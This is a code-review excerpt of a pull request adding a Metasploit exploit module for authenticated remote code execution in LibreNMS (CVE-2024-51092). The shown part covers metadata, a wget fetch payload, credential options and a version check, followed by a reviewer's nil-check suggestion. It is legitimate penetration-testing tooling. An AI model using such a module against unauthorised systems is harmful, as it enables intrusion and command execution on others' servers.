modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb

```diff
@@ -0,0 +1,258 @@
+        'Description' => %q{
+          An authenticated attacker can create dangerous directory names on the system and
+          alter sensitive configuration parameters through the web portal.
+          Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
+          thus achieving arbitrary code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'murrant (Tony Murray)', # PoC
+          'Takahiro Yokoyama'      # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/advisories/GHSA-x645-6pf9-xwxw'],
+          [ 'CVE', '2024-51092']
+        ],
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1),
+          'FETCH_URIPATH' => Rex::Text.rand_text_alpha(1)
+        },
+        'Payload' => {
+          'SPACE' => 128
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+        OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]),
+        OptString.new('PATH', [ true, 'LibreNMS installed location', '/opt/librenms' ]),
+        OptInt.new('WAIT', [ true, 'Wait time (seconds) for cron to poll the device', 315 ]),
+      ]
+    )
+  end
+
+  def get_csrf_token(res)
+    res&.get_html_document&.at('meta[name="csrf-token"]') ? res.get_html_document.at('meta[name="csrf-token"]')['content'] : nil
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    return Exploit::CheckCode::Unknown('LibreNMS is not detected.') unless res&.code == 200 && res&.body&.include?('<title>LibreNMS</title>')
+
+    token = get_csrf_token(res)
+    return Exploit::CheckCode::Unknown('LibreNMS detected. Failed to extract csrf token.') unless token
+
+    login
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'about')
+    })
+    return Exploit::CheckCode::Detected('LibreNMS detected. Version is unknown.') unless res&.code == 200
+
+    html_body = res&.get_html_document
+    version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
+    version_node&.at('span')&.content = ''
+    version = Rex::Version.new(version_node.text)
```

Comment:
I'm bit worried about `version_node.text` part as it can be `nil` after line 95 and therefore it can lead to module failure on line 97.
```suggestion
    version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
    return Exploit::CheckCode::Unknown('Cannot find librenmsversion') if version_node.nil?
    version_node&.at('span')&.content = ''
    version = Rex::Version.new(version_node.text)
```